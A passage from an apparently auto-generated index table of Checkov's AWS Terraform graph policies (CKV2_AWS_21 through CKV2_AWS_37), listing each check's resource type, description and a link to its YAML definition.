redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 545 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | -| 546 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | -| 547 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | -| 548 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 549 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 550 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 551 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 552 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 553 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 554 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 555 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 556 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | -| 557 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | -| 558 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | -| 559 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | -| 560 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 561 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 562 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 563 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 564 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 565 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 566 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 567 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 568 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 569 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 570 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 571 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 572 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 573 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 574 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 575 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 576 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 577 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 578 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 579 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 580 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 581 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 582 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 583 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 584 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 585 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 586 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 587 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 588 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 589 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 590 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 591 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 592 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 593 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 594 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 595 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 596 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 597 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 598 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 599 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 600 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 601 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 602 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 603 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 604 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 605 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 606 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 607 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 608 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 609 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 610 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 611 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 612 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 613 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 614 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 615 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 616 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 617 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 618 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 619 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 620 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 621 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 622 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 623 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 624 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 625 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 626 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 627 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 628 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 629 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 630 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 631 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 632 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 633 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 634 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 635 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 636 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 637 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 638 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 639 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 640 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 641 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 642 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 643 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 644 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 645 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 646 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 647 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 648 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 649 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | 